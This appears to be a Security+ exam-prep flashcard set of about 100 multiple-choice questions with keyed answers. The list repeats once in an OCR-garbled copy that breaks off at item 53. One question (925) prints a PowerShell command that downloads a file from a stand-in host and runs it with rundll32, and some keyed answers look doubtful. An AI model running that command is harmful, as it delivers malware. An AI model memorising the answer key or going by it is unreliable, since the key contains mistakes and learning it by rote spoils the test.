security+10

100 questions • 2 years ago
  • lopkeda

    Question list

  • 1

    QUESTION 912 A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

    The MRI vendor does not support newer versions of the OS.

  • 2

    QUESTION 913 A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

    GDPR

  • 3

    QUESTION 950 A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the following entries:
    106.35.45.53 - - [22/May/2020:07:00:58 +0100] "GET /login?username=admin&pin=0000 HTTP/1.1" 200 11705 "http://www.example.com/login.php"
    106.35.45.53 - - [22/May/2020:07:01:21 +0100] "GET /login?username=admin&pin=0001 HTTP/1.1" 200 11705 "http://www.example.com/login.php"
    106.35.45.53 - - [22/May/2020:07:01:52 +0100] "GET /login?username=admin&pin=0002 HTTP/1.1" 200 11705 "http://www.example.com/login.php"
    106.35.45.53 - - [22/May/2020:07:02:18 +0100] "GET /login?username=admin&pin=0003 HTTP/1.1" 200 11705 "http://www.example.com/login.php"
    106.35.45.53 - - [22/May/2020:07:02:18 +0100] "GET /login?username=admin&pin=0004 HTTP/1.1" 200 11705 "http://www.example.com/login.php"
    Which of the following password attacks is taking place?

    Brute-force

  • 4

    QUESTION 949 Which of the following control types is patch management classified under?

    Corrective

  • 5

    QUESTION 914 A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

    IPSec, SSL VPN

  • 6

    QUESTION 951 A company that provides an online streaming service made its customers' personal data, including names and email addresses, publicly available in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts. Which of the following BEST describes the consequence of this data disclosure?

    Reputation damage

  • 7

    A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the

    SaaS

  • 8

    QUESTION 952 Which of the following can be used to detect a hacker who is stealing company data over port 80?

    Packet capture

  • 9

    QUESTION 916 A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Choose two.)

    Time stamps, Time offset

  • 10

    QUESTION 917 A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

    Mandatory

  • 11

    QUESTION 953 A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data. Which of the following additional controls should be put in place first?

    Remote wipe

  • 12

    QUESTION 918 An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

    Data controller

  • 13

    QUESTION 954 An organization wants to quickly assess how effectively the IT team hardened new laptops. Which of the following would be the best solution to perform this assessment?

    Manually review the secure configuration guide checklists

  • 14

    QUESTION 919 Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

    SIEM

  • 15

    QUESTION 955 A user is trying to upload a tax document which the corporate finance department requested but a security program is prohibiting the upload. A security analyst determines the file contains P. Which of the following steps can the analyst take to correct this issue?

    Modify the exception list on the DLP to allow the upload

  • 16

    QUESTION 956 A cybersecurity analyst at Company A is working to establish a secure communication channel with a counterpart at Company B, which is 3,000 miles (4,828 kilometers) away. Which of the following concepts would help the analyst meet this goal in a secure manner?

    Key exchange

  • 17

    QUESTION 920 Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

    nmap

  • 18

    QUESTION 921 As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results: - The exception process and policy have been correctly followed by a majority of users. - A small number of users did not create tickets for the requests but were granted access. - All access had been approved by supervisors. - Valid requests for the access sporadically occurred across multiple departments. - Access, in most cases, had not been removed when it was no longer needed. Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

    Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the

  • 19

    QUESTION 957 A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

    System log

  • 20

    QUESTION 958 A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

    PGP

  • 21

    QUESTION 922 A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

    a PUP

  • 22

    QUESTION 923 A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

    Third-party applications are not being patched.

  • 23

    QUESTION 959 A user reset the password for a laptop but has been unable to log in to it since then. In addition, several unauthorized emails were sent on the user's behalf recently. The security team investigates the issue and identifies the following findings: - Firewall logs show excessive traffic from the laptop to an external site. - Unknown processes were running on the laptop. - RDP connections that appeared to be authorized were made to other network devices from the laptop. - High bandwidth utilization alerts from that user's username. Which of the following is most likely installed on the laptop?

    Trojan

  • 24

    QUESTION 924 A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user's list of cron jobs: */10 * * * * root /writable/update.sh Which of the following actions should the penetration tester perform NEXT?

    Privilege escalation

  • 25

    QUESTION 960 A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following authentication methods should the systems administrator choose? (Choose two.)

    Time-based one-time password, Hardware token

  • 26

    QUESTION 925 An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll; Start-Process rundll32.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found?

    A PowerShell code is performing a DLL injection.

  • 27

    QUESTION 961 Which of the following biometric authentication methods is the most accurate?

    Retina

  • 28

    QUESTION 926 Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

    White team

  • 29

    QUESTION 962 A security team will be outsourcing several key functions to a third party and will require that: - Several of the functions will carry an audit burden - Attestations will be performed several times a year - Reports will be generated on a monthly basis Which of the following best describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?

    SLA

  • 30

    QUESTION 927 A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

    MAC filtering

  • 31

    QUESTION 963 A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to prevent an attack like this from happening again? (Choose three.)

    Use the latest version of software, Implement a screened subnet for the web server, Install an endpoint security solution

  • 32

    QUESTION 964 A security investigation revealed that malicious software was installed on a server using a server administrator's credentials. During the investigation, the server administrator explained that Telnet was regularly used to log in. Which of the following most likely occurred?

    A packet capture tool was used to steal the password

  • 33

    QUESTION 928 A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

    Salting

  • 34

    QUESTION 965 Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following plans would fulfill this requirement?

    Communication plan

  • 35

    QUESTION 929 A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?

    Data steward

  • 36

    QUESTION 930 An employee used a corporate mobile device during a vacation. Multiple contacts were modified in the device during the employee's vacation. Which of the following attack methods did an attacker use to insert the contacts without having physical access to the device?

    Bluejacking

  • 37

    QUESTION 966 An employee who is using a mobile device for work is required to use a fingerprint to unlock the device. Which of the following is this an example of?

    Something you are

  • 38

    QUESTION 967 Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?

    Access control vestibules

  • 39

    QUESTION 931 A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

    Keylogger

  • 40

    QUESTION 968 Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

    NAC

  • 41

    QUESTION 932 A security analyst reviews web server logs and notices the following line: Which of the following vulnerabilities is the attacker trying to exploit?

    SQLi

  • 42

    QUESTION 969 A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites whether the employee is in the office or away. Which of the following solutions should the CISO implement?

    SWG

  • 43

    QUESTION 933 A user is having network connectivity issues when working from a coffee shop. The user has used the coffee shop as a workspace for several months without any issues. None of the other customers at the coffee shop are experiencing these issues. A help desk analyst at the user's company reviews the following Wi-Fi log:

    A denial-of-service attack by disassociation is occurring.

  • 44

    QUESTION 934 Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

    biometric scanner

  • 45

    QUESTION 970 A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?

    theHarvester

  • 46

    image

    MAC flooding

  • 47

    QUESTION 935 A company is moving to a new location. The systems administrator has provided the following server room requirements to the facilities staff: - Consistent power levels in case of brownouts or voltage spikes - A minimum of 30 minutes runtime following a power outage - Ability to trigger graceful shutdowns of critical systems Which of the following would BEST meet the requirements?

    Deploying an appropriately sized, network-connected UPS device

  • 48

    QUESTION 972 A security administrator needs to add fault tolerance and load balancing to the connection from the file server to the backup storage. Which of the following is the best choice to achieve this objective?

    Multipath

  • 49

    QUESTION 936 Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?

    Standard naming convention policy

  • 50

    QUESTION 937 A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else. Which of the following is the most likely reason for this request?

    The CSIRT thinks an insider threat is attacking the network.

  • 51

    QUESTION 973 Which of the following incident response phases should the proper collection of the detected IoCs and establishment of a chain of custody be performed before?

    Identification

  • 52

    QUESTION 974 Which of the following measures the average time that equipment will operate before it breaks?

    MTBF

  • 53

    QUESTION 938 Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's main gate?

    False rejection

  • 54

    QUESTION 975 A security administrator examines the ARP table of an access switch and sees the following output:

    MAC flooding on fa0/2 port

  • 55

    QUESTION 939 Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?

    Outsourced code development

  • 56

    QUESTION 976 Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?

    Disaster recovery plan

  • 57

    QUESTION 940 A police department is using the cloud to share information with city officials. Which of the following cloud models describes this scenario?

    Community

  • 58

    QUESTION 941 A user reports that a bank's website no longer displays a padlock symbol. A security analyst views the user's screen and notices the connection is using HTTP instead of HTTPS. Which of the following attacks is most likely occurring?

    SSL stripping

  • 59

    QUESTION 977 Which of the following roles is responsible for defining the protection type and classification type for a given set of files?

    Data owner

  • 60

    QUESTION 942 A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability. Which of the following would be the most cost-effective solution for the data center to implement?

    Uninterruptible power supplies with battery backup

  • 61

    QUESTION 978 An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:

    an authentication application

  • 62

    QUESTION 943 A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

    SSH key

  • 63

    QUESTION 979 Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?

    Devices with cellular communication capabilities bypass traditional network security controls

  • 64

    QUESTION 944 A security analyst is assisting a team of developers with best practices for coding. The security analyst would like to defend against the use of SQL injection attacks. Which of the following should the security analyst recommend first?

    Input validation

  • 65

    QUESTION 980 While troubleshooting service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity requirements. Which of the following would be the best solution to securely prevent future issues?

    Configuring a service account to run the processes

  • 66

    QUESTION 945 Cloud security engineers are planning to allow and deny access to specific features in order to increase data security. Which of the following cloud features is the most appropriate to ensure access is granted properly?

    Resource policies

  • 67

    QUESTION 981 A security analyst is assessing a newly developed web application by testing SQL injection, CSRF, and XML injection. Which of the following frameworks should the analyst consider?

    OWASP

  • 68

    A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

    cat /var/messages | grep 10.1.1.1

  • 69

    QUESTION 982 A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?

    Rogue access point

  • 70

    QUESTION 983 Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?

    Lessons learned

  • 71

    image

    User-agent spoofing

  • 72

    QUESTION 984 A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a significant amount of risk to the network. Which of the following would allow users to access the legacy devices without compromising the security of the entire network?

    Jump server

  • 73

    QUESTION 948 Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

    Lessons learned

  • 74

    QUESTION 985 Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

    Threat feeds

  • 75

    QUESTION 986 Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?

    Tabletop

  • 76

    QUESTION 987 Which of the following disaster recovery sites is the most cost effective to operate?

    Cold site

  • 77

    QUESTION 988 A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files' activity against known threats. Which of the following should the security operations center implement?

    Cuckoo

  • 78

    QUESTION 989 A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?

    Provisioning

  • 79

    QUESTION 990 A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

    Load balancing

  • 80

    QUESTION 991 A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server. Which of the following algorithms should the administrator use to split the number of the connections on each server in half?

    Round-robin

  • 81

    QUESTION 992 Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

    Correlation dashboards

  • 82

    QUESTION 993 A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

    Data processor

  • 83

    QUESTION 994 An attacker is targeting a company. The attacker notices that the company's employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees' devices will also become infected. Which of the following techniques is the attacker using?

    Watering-hole attack

  • 84

    QUESTION 995 A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

    Image volatile memory

  • 85

    QUESTION 996 A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security measures is most likely used for this mandate?

    Input validation

  • 86

    QUESTION 997 A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

    Ensuring that port 53 has been explicitly allowed in the rule set

  • 87

    QUESTION 998 A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

    Sensitive

  • 88

    QUESTION 999 A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?

    Patch availability

  • 89

    QUESTION 1000 During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

    access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

  • 90

    QUESTION 1001 Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

    Preparation

  • 91

    QUESTION 1002 An administrator is reviewing a single server's security logs and discovers the following:

    Brute-force attack

  • 92

    QUESTION 1003 Which of the following can be used to identify potential attacker activities without affecting production servers?

    Honeypot

  • 93

    QUESTION 1004 A company wants the ability to restrict web access and monitor the websites that employees visit. Which of the following would best meet these requirements?

    Internet proxy

  • 94

    QUESTION 1005 A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

    DDoS

  • 95

    QUESTION 1006 A company needs to centralize its logs to create a baseline and have visibility on its security events. Which of the following technologies will accomplish this objective?

    Security information and event management

  • 96

    QUESTION 1007 Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers would like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

    Data masking

  • 97

    QUESTION 1008 A large retail store's network was breached recently, and this news was made public. The store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the store lost revenue after the breach. Which of the following is the most likely reason for this issue?

    Reputation damage

  • 98

    QUESTION 1009 A government organization is developing an advanced AI defense system. Developers are using information collected from third-party providers. Analysts are noticing inconsistencies in the expected progress of the AI learning and attribute the outcome to a recent attack on one of the suppliers. Which of the following is the most likely reason for the inaccuracy of the system?

    Tainted training data

  • 99

    QUESTION 1010 A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

    Someone near the building is jamming the signal.

  • 100

    QUESTION 1011 Which of the following can best protect against an employee inadvertently installing malware on a company system?

    Least privilege

  • security+1

    security+1

    lopkeda · 100問 · 2年前

    security+1

    security+1

    100問 • 2年前
    lopkeda

    security+2

    security+2

    lopkeda · 100問 · 2年前

    security+2

    security+2

    100問 • 2年前
    lopkeda

    security+6

    security+6

    lopkeda · 100問 · 2年前

    security+6

    security+6

    100問 • 2年前
    lopkeda

    security+7

    security+7

    lopkeda · 100問 · 2年前

    security+7

    security+7

    100問 • 2年前
    lopkeda

    security+8

    security+8

    lopkeda · 100問 · 2年前

    security+8

    security+8

    100問 • 2年前
    lopkeda

    security+9

    security+9

    lopkeda · 100問 · 2年前

    security+9

    security+9

    100問 • 2年前
    lopkeda

    security+11

    security+11

    lopkeda · 100問 · 2年前

    security+11

    security+11

    100問 • 2年前
    lopkeda

    security+12

    security+12

    lopkeda · 64問 · 2年前

    security+12

    security+12

    64問 • 2年前
    lopkeda

    cysa+1

    cysa+1

    lopkeda · 100問 · 2年前

    cysa+1

    cysa+1

    100問 • 2年前
    lopkeda

    cysa+2

    cysa+2

    lopkeda · 100問 · 2年前

    cysa+2

    cysa+2

    100問 • 2年前
    lopkeda

    cysa+3

    cysa+3

    lopkeda · 54問 · 1年前

    cysa+3

    cysa+3

    54問 • 1年前
    lopkeda

    A+1

    A+1

    lopkeda · 100問 · 1年前

    A+1

    A+1

    100問 • 1年前
    lopkeda

    問題一覧

  • 1

    QUESTION 912 A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

    The MRl vendor does not support newer versions of the OS.

  • 2

    QUESTION 913 A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

    GDPR

  • 3

    QUESTION 950 A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the flowing entries: 106.35. 45.53 - - [22/Miay/2020 :07:00:58 +0100) "GET /login?username= a calnápin=0000 HTTP/1 .1" 200 11705 "http:1www.example.com/login php" 106.35. 45.53 - (22/May/2020:07:01:21 +01001 "GET /1ogin?username-a cminápin=0001 HTTP/1. 1" 200 11705 "http:1/www.exaniple.com/login.php" 106.35.45.53-- (22/May/2020:07:01:52 +0100) GET /1ogin?usernamema dmin&pin-0002 HTTP/1.1" 200 11705 "ht tp://www.exanple,com/login.php" 106.35. 45.53-- [22/May/2020:07:02:18 +0100) "GET /login ?use rname=acmin&pin=0003 HTTP/1.14 200 11705 "http://www.example. com/login.php" 106.35.45,53-- [22/May/2020:07:02:18 +0100) "GET /login?use rname=a cmin&pin=0004 HTTP/1.1" 200 11705 "http:/ Iwww.example,com/login.php" Which of the following password attacks is taking place?

    Brute-force

  • 4

    QUESTION 949 Which of the following control types is patch management classified under?

    Corrective

  • 5

    QUESTION 914 A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

    IPSec, SSL VPN

  • 6

    QUESTION 951 A company that provides an online streaming service made its customers' personal data, including names and email addresses, publicly available in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts. Which of the following BEST describes the consequence of this data disclosure?

    Reputation damage

  • 7

    A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the

    SaaS

  • 8

    QUESTION 952 Which of the following can be used to detect a hacker who is stealing company data over port 80?

    Packet capture

  • 9

    QUESTION 916 A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Choose two.)

    Time stamps, Time offset

  • 10

    QUESTION 917 A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

    Mandatory

  • 11

    QUESTION 953 A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data. Which of the following additional controls should be put in place first?

    Remote wipe

  • 12

    QUESTION 918 An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

    Data controller

  • 13

    QUESTION 954 An organization wants to quickly assess how effectively the IT team hardened new laptops. Which of the following would be the best solution to perform this assessment?

    Manually review the secure configuration guide checklists

  • 14

    QUESTION 919 Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

    SIEM

  • 15

    QUESTION 955 A user is trying to upload a tax document which the corporate finance department requested but a security program is prohibiting the upload. A security analyst determines the file contains P. Which of the following steps can the analyst take to correct this issue?

    Modify the exception list on the DLP to allow the upload

  • 16

    QUESTION 956 A cybersecurity analyst at Company A is working to establish a secure communication channel with a counterpart at Company B, which is 3,000 miles (4,828 kilometers) away. Which of the following concepts would help the analyst meet this goal in a secure manner?

    Key exchange

  • 17

    QUESTION 920 Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

    nmap

  • 18

    QUESTION 921 As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results: - The exception process and policy have been correctly followed by the majority of users. - A small number of users did not create tickets for the requests but were granted access. - All access had been approved by supervisors. - Valid requests for the access sporadically occurred across multiple departments. - Access, in most cases, had not been removed when it was no longer needed. Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

    Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the

  • 19

    QUESTION 957 A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

    System log

  • 20

    QUESTION 958 A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

    PGP

  • 21

    QUESTION 922 A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

    a PUP

  • 22

    QUESTION 923 A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

    Third-party applications are not being patched.

  • 23

    QUESTION 959 A user reset the password for a laptop but has been unable to log in to it since then. In addition, several unauthorized emails were sent on the user's behalf recently. The security team investigates the issue and identifies the following findings: - Firewall logs show excessive traffic from the laptop to an external site. - Unknown processes were running on the laptop. - RDP connections that appeared to be authorized were made to other network devices from the laptop. - High bandwidth utilization alerts from that user's username. Which of the following is most likely installed on the laptop?

    Trojan

  • 24

    QUESTION 924 A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user's list of cron jobs: */10 * * * * root /writable/update.sh Which of the following actions should the penetration tester perform NEXT?

    Privilege escalation

  • 25

    QUESTION 960 A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following authentication methods should the systems administrator choose? (Choose two.)

    Time-based one-time password, Hardware token

  • 26

    QUESTION 925 An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll; Start-Process rundll32.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found?

    A PowerShell code is performing a DLL injection.

  • 27

    QUESTION 961 Which of the following biometric authentication methods is the most accurate?

    Retina

  • 28

    QUESTION 926 Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

    White team

  • 29

    QUESTION 962 A security team will be outsourcing several key functions to a third party and will require that: - Several of the functions will carry an audit burden - Attestations will be performed several times a year - Reports will be generated on a monthly basis Which of the following best describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?

    SLA

  • 30

    QUESTION 927 A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

    MAC filtering

  • 31

    QUESTION 963 A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to prevent an attack like this from happening again? (Choose three.)

    Use the latest version of software, Implement a screened subnet for the web server, Install an endpoint security solution

  • 32

    QUESTION 964 A security investigation revealed that malicious software was installed on a server using a server administrator's credentials. During the investigation, the server administrator explained that Telnet was regularly used to log in. Which of the following most likely occurred?

    A packet capture tool was used to steal the password

  • 33

    QUESTION 928 A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

    Salting

  • 34

    QUESTION 965 Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following plans would fulfill this requirement?

    Communication plan

  • 35

    QUESTION 929 A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?

    Data steward

  • 36

    QUESTION 930 An employee used a corporate mobile device during a vacation. Multiple contacts were modified in the device during the employee's vacation. Which of the following attack methods did an attacker use to insert the contacts without having physical access to the device?

    Bluejacking

  • 37

    QUESTION 966 An employee who is using a mobile device for work is required to use a fingerprint to unlock the device. Which of the following is this an example of?

    Something you are

  • 38

    QUESTION 967 Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?

    Access control vestibules

  • 39

    QUESTION 931 A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

    Keylogger

  • 40

    QUESTION 968 Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

    NAC

  • 41

    QUESTION 932 A security analyst reviews web server logs and notices the following line: Which of the following vulnerabilities is the attacker trying to exploit?

    SQLi

  • 42

    QUESTION 969 A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites whether the employee is in the office or away. Which of the following solutions should the CISO implement?

    SWG

  • 43

    QUESTION 933 A user is having network connectivity issues when working from a coffee shop. The user has used the coffee shop as a workspace for several months without any issues. None of the other customers at the coffee shop are experiencing these issues. A help desk analyst at the user's company reviews the following Wi-Fi log:

    A denial-of-service attack by disassociation is occurring.

  • 44

    QUESTION 934 Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

    biometric scanner

  • 45

    QUESTION 970 A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?

    theHarvester

  • 46

    image

    MAC flooding

  • 47

    QUESTION 935 A company is moving to a new location. The systems administrator has provided the following server room requirements to the facilities staff: - Consistent power levels in case of brownouts or voltage spikes - A minimum of 30 minutes runtime following a power outage - Ability to trigger graceful shutdowns of critical systems Which of the following would BEST meet the requirements?

    Deploying an appropriately sized, network-connected UPS device

  • 48

    QUESTION 972 A security administrator needs to add fault tolerance and load balancing to the connection from the file server to the backup storage. Which of the following is the best choice to achieve this objective?

    Multipath

  • 49

    QUESTION 936 Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?

    Standard naming convention policy

  • 50

    QUESTION 937 A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else. Which of the following is the most likely reason for this request?

    The CSIRT thinks an insider threat is attacking the network.

  • 51

    QUESTION 973 Which of the following incident response phases should the proper collection of the detected IoCs and establishment of a chain of custody be performed before?

    Identification

  • 52

    QUESTION 974 Which of the following measures the average time that equipment will operate before it breaks?

    MTBF

  • 53

